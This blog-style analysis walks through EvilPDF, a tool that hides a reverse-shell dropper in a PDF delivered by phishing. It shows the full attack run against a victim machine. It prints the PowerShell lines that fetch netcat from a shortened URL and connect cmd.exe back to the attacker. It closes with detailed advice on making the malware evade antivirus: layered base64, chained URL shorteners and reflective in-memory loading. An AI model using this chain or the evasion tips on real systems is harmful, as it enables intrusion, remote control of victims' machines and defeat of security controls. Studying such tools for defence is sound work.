EvilPDF Analysis - Jaymon Security

Table of Contents show

Description and installation of EvilPDF

We are going to study the operation of this tool, which provides the user with the ability to embed an executable file in a PDF document. In its Github repository it is defined as such, although it is not really the most accurate definition, as we will see throughout the analysis. The tool can be found in its github repository.

https://github.com/JAYMONSECURITY/evilpdf

As we can see below, the project consists of several files, the most important of which are the following:

“adobe.pdf”: used as default PDF file.
“source.c”: this is the source code of the malware that will be embedded in the PDF file.
“template.html”: this is the website that will be visited to call the malware auto-download.
“evilpdf.py”: this is the main file from which all the parameters will be configured to obtain the final PDF file with the embedded executable.

The first thing we are going to do is to follow the instructions to download “evilPDF” in our Kali Linux machine, install the necessary components for its execution, and finally run it to see its correct functioning.

As we can see, we have installed the tool correctly and can now run it without any problems.

Configuration and study

Before proceeding to the execution and configuration of the parameters, to obtain the final PDF with the “embedded malicious executable”, let’s take a look at the files that we have right now in the directory. This is important because after the execution of the tool we will be able to see how new files have been created and will be studied.

Once the files have been observed, we will know our IP address in order to be able to configure the tool after its execution.

Now we can proceed to launch and configure the tool as follows, using the default values for this PoC.

As we can see in the image above, we have used the default PDF “adobe.pdf” that comes in the repository, to make this proof of concept (PoC). The malicious executable will be called “getadobe” by default, once the “source.c” file is compiled with the following parameters. In LHOST we have entered the IP address of our attacking machine, which will be where we will receive the reverse shell from the victim machine. We have chosen to use port 80 (HTTP) for the reverse connection since it is normally open in firewalls, and thus we guarantee a high percentage that the intrusion on the victim machine will be successful. As for the URL that will be launched after the execution of the malicious PDF file, we leave by default the one of the official adobe website.

Once all the parameters have been set, the tool goes on to build the malware by compiling the “source.c” file that we will see later. It then converts the compiled binary (exe) to base64 so that it can be embedded in “page.html”. Finally, “page.html” (which contains the malicious binary embedded in its source code) is embedded in the PDF file. At this point the malicious PDF file has been created. Now the PDF file (“adobe.pdf”) is compressed in “zip”, and the compressed file is converted to base64 to embed it in “index.html”, using “template.html” as a template. Once this is done, we proceed to listen to port 80 in order to receive the command shell from the victim machine, once the user has executed our malicious PDF.

Here we can see how the new files mentioned above were created during the launching of the tool. During the execution of the tool, new files are created that are self-deleted once they have fulfilled their objectives, such as the source code “rs.c”, which is nothing more than the same source code of “source.c” but with the IP and PORT parameters set by the user; and the binary “getadobe.exe” which is the result of compiling “rs.c”.

It is always a good practice to check that the port where we should receive the reverse connection from the victim is waiting for the connection in “listening” mode:

Execution and study of EvilPDF

At this point we can either pass the malicious PDF file to the victim machine directly through the use of storage devices, or we can build an attack vector using social engineering to carry out a phishing attack, whereby the victim clicks on a button that leads to a link pointing to the attacking web server, ready to self-download the malware. To do this we will have to enable our attacking machine as a web server, to allow the victim to connect via the web and download the malware.

To do this, just run the command provided by the tool itself when launching the “listener”, as shown below. It is important to launch the command placed under the same directory where the generated malware is, since it will mount the web server there and the objective is that the malware is accessible to the outside. When visiting “http://192.168.222.128:3333” we can see the request to the server (framed in blue). We will see later what happens when visiting this URL, as well as a brief study of network packet capture with Wireshark.

As a good practice, we check that port 3333 is listening:

Now let’s imagine that we perform a phishing attack on a victim, and the victim, upon receiving the email, clicks on the “cheat” button and it leads him to make a GET request via HTTP to the website “http://192.168.222.128:3333” . When visiting the website, the first thing we see is that a window opens to download a compressed file in “zip”, and depending on the browser, it even downloads itself directly without prior warning.

And in a matter of milliseconds, almost imperceptibly, it redirects to the official Adobe website so that the victim thinks it is a legitimate download.

Once the victim has downloaded the compressed file, we can see that when decompressing it, a PDF file is obtained.

When we run that PDF file, we see that we are warned that it contains a file called “page.html” and that it may be malicious. We proceed to open the file and see what happens next.

Having accepted to open the PDF file containing “page.html”, we see that it opens a URL in our browser and takes us directly to an auto-download of a binary called “getadobe.exe”. We proceed to save it in our download directory as we see below. It is important to observe how after the call to the autodownload of the binary embedded in “page.html”, the URL of the official adobe website is called again.

Once saved, we proceed to its execution and we see how we receive the command shell of the victim machine, on port 80 of our attacker machine.

The objective has been met without incident.

Detailed study of the source code

We will now go on to study the source code of the tool in more detail.

a) Parsing the executor file “evilpdf.py”.

Let’s start with the analysis of “evilpdf.py”, written in Python. It is the main executor. As we can see below, it consists of several modules.

First of all we can see how a check is made to see if different tools are installed in the system, necessary for the correct execution of the different modules that evilPDF consists of. These tools are “base64” (to encode files and embed them in html pages), “zip” (to compress files in this particular case), “nc” (to listen to the port where the victim’s command shell will be received), “php” (to raise a web server to which the victim will connect to auto-download the malware), and “i686-w64-mingw32-cc” (C language compiler for 64-bit Windows systems).

In addition, in the final part of the previous image you can also see the function that will open “adobe.pdf” in binary for reading (“rb”) and writing (“PdfFileWriter”), by which you will embed “page.html” in your source code.

In the following image we can see the system call that will compile the “rc.c” file, the result of entering the port (payload_port) and attacker IP address (payload_server) parameters in the source code of the “source.c” file. The result of the compilation will have the default name of “getadobe.exe”, contained in the variable “payload_name”. The result will be the malicious binary for Windows 64bits, which will run a reverse shell on the victim machine, giving control of the victim machine’s command shell to the attacker.

Once the malicious binary is obtained, we see how it is converted to base64 and saved in the “b64” file, and then embedded in the html code of the “page.html” file.

We see that after the first conditional “if”, we find an “else”, because if in the configuration parameters we have introduced a compiled malware (exe) located in a different path, it goes directly to convert it into base64 for further processing.

In the last part of the image we can see how it embeds the base64 binary in the “page.html” file, using the “template.html” file for the substitution of internal parameters by using the “sed” command.

In another part of the function, we see how after the malicious PDF with embedded “page.html” is created, it is compressed into a “zip” file, and then this compressed file is converted to base64, saving the result in the “b64” file. Finally, the content of this last file is embedded in “index.html”. We can see how, through the “sed” command, a specific text is replaced by another one in the “template.html” file, and the result is saved in a new file called “index.html”.

b64″ file with “adobe.zip” file converted to base64.

In the following image we can see that the “nc” tool is used to listen to the port (80) previously defined in the parameters, contained in the “payload_port” variable, in order to receive the reverse shell when the victim executes the malicious PDF.

b) Analyzing the file “source.c”, “rc.c”, “b.ps1” and “a.exe”.

These four files will be analyzed in the same section because they all share the same root: “source.c”.

Next we are going to see the content of the “source.c” file. As we can see, it is a very simple code written in C language, for execution in Windows systems. It only makes a call to the system through the “system()” function defined in the “windows.h” library, by means of which it obtains the same results as the execution of direct commands in the system terminal (“cmd.exe”).

First create the “temp” directory in the root of the victim’s Windows system (“c:\”). Once the directory is created, proceed to create the file “b.ps1” with the following content:

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

(wget ‘https://tinyurl.com/y88r9epk’ -OutFile c:\temp\a.exe)

Once the “b.ps1” file has been created, it is executed by means of “powershell”. After the execution, the executable “a.exe” will be downloaded to the victim machine, in the “c:\temp\” directory, and it will be executed by means of the “start /MIN” command (to execute with a minimized screen that will pass more unnoticed to the victim’s eye), with the payload_server parameters corresponding to the IP 192.168.222.128 belonging to the attacking machine, and “payload_port” corresponding to port 80 listening on the attacking machine, plus the “-e cmd.exe -d” flags. We conclude that “a.exe” is really a “netcat” with a different name, and what it does is simply make a connection to port 80 of the attacking machine by giving up the command shell (“cmd.exe”) of the victim machine. However, this will be discussed later.

Source code of “rc.c”, same as “source.c” but with IP and port parameters already set.

After disassembling the binary “getadobe.exe”, product of compiling the “rc.c” file, we see perfectly the instructions described above.

In the following image we can see the creation of the “temp” directory, the “b.ps1” file and the download using the “wget” command of the “a.exe” binary, which is “netcat”. It is curious to see that it uses HTTPS for the download of “a.exe”, by secure protocol with TLS to evade possible antivirus systems, since the download will be encrypted.

As a curiosity we can see the service used by the tool to mask the URL.

If we analyze the shortened URL, using the service provided by “getlinkinfo.com” to see the original URL, we see that the URL indeed points to the download from github of “nc.exe”.

Once downloaded “nc.exe” and saved in the “c:/temp” directory as “a.exe”; If we run “a.exe” we see that it presents the same interface as “netcat”, and if we upload it to “virustotal.com” to perform a quick scan, we can see that several antivirus engines qualify it as “netcat”.

c) Analyzing the “page.html” file.

Next we are going to see the source code of “page.html”. As we can see, it has an embedded executable file in base64. We know this because of the “magic numbers” corresponding in base64 to binary files (“TVqQAAMAAAAAAAAAAA//…”).

When “page.html” is opened, the embedded “getadobe.exe” binary is downloaded. After downloading, a redirection is made to the https://get.adobe.com/flashplayer/ website to hide the malicious activity.

d) Analyzing the “index.html” file.

Next we are going to see the source code of “index.html”. As we can see it has embedded in base64 a compressed “zip” file. We know this by the “magic numbers” corresponding in base64 to “zip” files (“UEsDBBQAAAAAAIAK5i…”).

In the same way as “page.html”, the self-downloading of the zip file is performed, and then the website is redirected to https://get.adobe.com/flashplayer/ to make the malicious activity go unnoticed. It is logical that both “page.html” and “index.html” execute actions in the same way, since both have been created from the “template.html” file.

e) Analyzing the “template.html” file.

As we can see below, this file is the basis for the two previous files studied: “page.html” and “index.html”. From this file the texts of “data_base64” and “payload_name” are replaced to create the aforementioned files.

f) Static analysis of the “adobe.pdf” file.

After the execution of “evilpdf” we obtain the file “adobe.pdf”, which is undoubtedly the main executing engine that triggers, in a domino effect, the calls to the rest of the files generated by the tool, embedded in each other.

If we open the file “adobe.pdf” to read it in hexadecimal, we can see very interesting sections where the file “page.html” is embedded. We can also see that the execution of “page.html” is called by using JavaScript with the “OpenAction” instruction.

If we continue looking down the file, we find the embedded file in base64 in “page.html”. First, we see in the green box the redirection function to the adobe web. Subsequently, we see in the final red box the embedded binary, which is an executable for its “magic numbers”, as we have seen previously. It is “getadobe.exe”.

If we continue until the end of the base64 characters, we can see that it is indeed “getadobe.exe”.

Summary: overall view of the analysis

At this point, we already have our global visualization of how the malware assembly performed by the tool works. Graphically we could describe it with the following image:

So we can say that:

“index.html”: contains “adobe.zip” embedded. Download as soon as you visit the website “http://192.168.222.128:3333”.
“adobe.zip”: contains “adobe.pdf”. It is extracted manually by the victim user.
“adobe.pdf”: contains “page.html”, which is executed when “adobe.pdf” is opened.
“page.html”: contains “getadobe.exe” embedded. When “page.html” is opened, it calls the download of “getadobe.exe”.
“getadobe.exe”: when executed, it creates the file “b.ps1”. Once created, it is executed with powershell.
“b.ps1”: when executed, proceeds to download the file “a.exe” from https://tinyurl.com/y88r9epk.
“a.exe”: this is “netcat”, which is used to perform the reverse connection to the attacking machine by giving the attacker the command shell of the victim machine.

Network traffic analysis with Wireshark

a) Network traffic during the delivery phase.

We are now going to study only the network traffic generated when the victim clicks on the button of the phishing email sent by the attacker, deceiving the victim with social engineering.

When the button is clicked, it leads to the link http://192.168.222.128:3333. At this point the victim executes via the web the “index.html” file studied above.

As we can see in the following image, the web code is perfectly readable since it does not present any type of encryption. In this code we can see how the victim downloads the compressed file “adobe.zip”, embedded in base64 in “index.html”. And then the web is redirected via the “location.replace” instruction to https://get.adobe.com/flashplayer/.

We are not going to study the network traffic generated by “page.html” because as it is embedded in the “adobe.pdf” file itself, which is on the victim machine, it is understood that “page.html” does not generate network traffic outside the victim machine (localhost).

We are not going to study the network traffic generated by the execution of the file “b.ps1” when downloading the executable file “nc.exe” from “Github”, because it is clear that the traffic travels encrypted over HTTPS, and also because it is clear what action it performs.

b) Network traffic during the operation phase.

At this point, we are now at the point of exploitation, i.e. when the attacker has already received the command shell from the victim machine and proceeds to execute remote commands.

As we can see in the following image, all the commands launched by the attacker, and all the information received from the victim machine travels in clear text over the network. This is important because any other attacker located under the same network could capture confidential information through a Man In The Middle (MITM) attack.

To prevent traffic from traveling in the clear, while maintaining the same connection functionalities as “netcat”, the easiest solution would be to use “cryptcat”, since with “cryptcat” the information travels encrypted over the network.

Curiosities and considerations

a) “Evilpdf” armed with meterpreter.

Perhaps someone has asked the question why settle for a conventional command shell, couldn’t the PDF file be assembled with an executable to receive a “reverse shell meterpreter”?

Actually, the quick answer I can think of is that a conventional shell like the one provided by “evilpdf” with “netcat” is more than enough to upgrade it to a “meterpreter” type shell. We will only have to prepare the scenario to receive the shell in Metasploit through “exploit/multi/handler” configured with the payload “windows/x64/shell/reverse_tcp”.

Once the command shell has been received from the victim machine, in order to elevate it to “meterpreter” it would be enough, in most cases, to launch the command “sessions -u “. In this way we would already have a meterpreter shell with which to take advantage of the full potential of the post-exploitation modules offered by Metasploit.

However, let’s assume that even knowing the above, we want to mount the malicious PDF with a reverse meterpreter binary. A quick example to mount our own reverse meterpreter malware with “msfvenom” would be as follows:

Once we have this malware prepared, it would be as easy as putting its path in the right parameter of “evilpdf”, and it will automatically perform the necessary instructions to embed it in the final PDF file.

It should be noted that in the case of using this malware created with msfvenom, which would give us a reverse meterpreter shell of the victim machine, the automatic part provided by “evilpdf” of listening with “netcat” the port where to receive the shell of the victim machine would not be useful, since being a “meterpreter” we should configure the “exploit/multi/handler” of Metasploit, with the payload “windows/x64/meterpreter/reverse_tcp” to correctly receive the “shell meterpreter” of the victim machine, as we have configured the parameters of “msfvenom” for the creation of the malware.

b) “Evilpdf” has code disabled.

As a curiosity, in the source code of “evilpdf.py” we find a function that is disabled:

It is curious to see how it makes use of the service provided by “serveo.net” by creating a connection tunnel through “ssh” with “TCP forwarding”. More information on how serveo works can be found on its own web page http://serveo.net.

We can also see how it raises a web server on the attacking machine (localhost) on port 3333, using “php”. Once this is done, we can see that it proceeds to obtain a connection link to “serveo.net”, and then obfuscates it using the “bitly.com” link shortener service.

Conclusions and recommendations

Throughout the analysis we have been able to see how easy it is nowadays to assemble malicious PDF files automatically, without the need for the attacker to have any advanced computer knowledge. The tool itself is responsible for assembling the malware, embedding it in the PDF file, and finally setting the stage to take control of those machines that execute the malicious file.

It is clear that the main objective of this tool is to execute malware on a victim machine, bypassing its security controls. Actually, in a first contact with the PDF file, we can say that it is well done. Logically, it is not FUD (totally undetectable), since it has a base64 executable embedded in its source code, it would be quite strange that none of the antivirus engines on the market would notice these “magic numbers”, but even so, we can see how “at first contact” it evades a large number of antivirus engines on the market today.

I emphasize “on first contact” because after the execution of the PDF, which may go unnoticed by antivirus systems, several system calls and external malware downloads are triggered, which are fully detectable by many antivirus systems.

There are two main types of attack vectors that can be used to spread this type of malware: social engineering (phishing…) and removable media (USB…).

The recommendations to avoid becoming a victim of such an attack are not very different from the more conventional ones, such as keeping systems updated and well patched, having a legitimate antivirus installed and updated, and having good training in cybersecurity awareness.

Actually, the execution of this malicious PDF, in a business environment where all systems are updated, patched and properly protected with an antivirus, should not even pass the first filter, since only by the fact of performing a raw download of an executable that touches disk, that does not present any valid digital signature, and that the first thing it does is a direct connection to another machine without user permission, is more than enough to detect, at least, a suspicious behavior and interrupt the operation of the malicious.

I am not going to explain in this article how we could obtain a FUD operation by using this tool, because it is not the objective of this study. However, it is to the author’s credit that “evilpdf”, with certain modifications, opens the door to be able to perform Red Team operations with very powerful social engineering vectors, for which his work and effort is to be thanked.

Proposed improvements for EvilPDF

To serve as constructive criticism to the author of “EvilPDF”, whom I thank and acknowledge for his work, I believe that the following modifications could substantially improve the tool:

Source code of the “source.c” file

The use of the “system()” function: generates a system call that does not go unnoticed by security controls. In addition, the action is duplicated by using this function and then launching the command “cmd.exe /c …” with arguments. Using this type of execution (“cmd.exe /c”) the action goes out of the flow of the “parent process” itself, creating new processes in the system (such as “cmd.exe”) that trigger alarms in detection systems. Under the same instruction of “cmd.exe /c ” the “start” command is executed, when in fact it could be stated at a practical level that they perform the same function. A simple test could be obtained by executing “cmd /c calc.exe” and “start calc.exe” from the command prompt (“cmd.exe”), and you will see the same results of the execution. Just as “cmd.exe /c …” creates a new thread, so does the “start” command. That is why the author of the tool has been cautious and has added the “/MIN” flag, so that the execution via the “start” command is performed in a “minimized” way and goes unnoticed by the victim.” In short, to be more evasive in detection, instead of using the “system()” function, I think it is better to use the “ShellExecute()” or “WinExec()” functions.

Create “temp” directory in “C:\”: the directory is created using the command “mkdir c:\temp”. First of all, creating a directory that does not exist previously has several disadvantages, since it leaves a registry and in addition, antivirus systems are constantly monitoring this behavior, which if it does not come from legitimate software with valid digital signatures, they understand that it is a suspicious behavior. Another issue is to force to create the directory in the “C:\” Drive, but what if the user has changed the Drive letter? Then the “C:\” Drive would not be found and the “temp” directory could not be created. My recommendation to avoid being detected for creating directories in the predefined root Drive, is to work directly in the temp directory, defined in the global system variable “%TEMP%”, and that will point to the right directory and the right Drive. In addition, this ensures that the victim user has write privileges in that directory and can create files without any problems.

The URL “tinyurl.com/y88r9epk”: it is very easy to detect the original URL. I recommend using “a URL shortener over a different URL shortener”, a minimum of two times to obfuscate the URL better, and make it more difficult to parse.

The use of Powershell: it is necessary to download the file via HTTPS. However, bear in mind that nowadays in many Organizations its use is very restricted and even disabled for users without administrative privileges, so that a user with “normal” privileges could not use it. In addition, AV systems (AMSI…) constantly monitor the use of Powershell to prevent the execution of in-memory malware, which make incoming and outgoing connections to the victim system from remote command and control (C2) systems, such as “Empire” and others. My recommendation is not to download a full executable, but to embed it as well as the rest of the files; or else, download the executable (exe, dll…) as a text file in “double or triple base64” to avoid the “magic numbers”. Once downloaded to disk, run it in memory by reflection to avoid detections.

Launching of script “b.ps1”: the execution of Powershell scripts is not always successful, due to different system measures in reference to the “ExecutionPolicy”. It is preferable to launch the script instructions in a single line from the “cmd”. This will also avoid creating the “b.ps1” file on the system, which leads to possible detections.

General aspects

When embedding base64 files, we have seen that they are very easily detectable “magic numbers”. That is why I recommend converting each embedded file to base64 at least twice. This way we will avoid further detections. Be aware that for each conversion to base64, the characters are duplicated, and this must be taken into account if you want to run binaries in memory because of the “buffer” issue, since this does not have an infinite space and “crashes”.

Network traffic

By using “netcat” as a Trojan to obtain the reverse shell of the victim machine, we see how all network traffic between the victim and the attacker, in a bidirectional manner, travels in clear text. Needless to say the dangers involved. This is why I recommend changing the use of “netcat” to “cryptcat” or “ncat” with SSL. My next article will be on the use and study of these three tools so that their differences can be clearly seen.

Analysis of the EvilPDF tool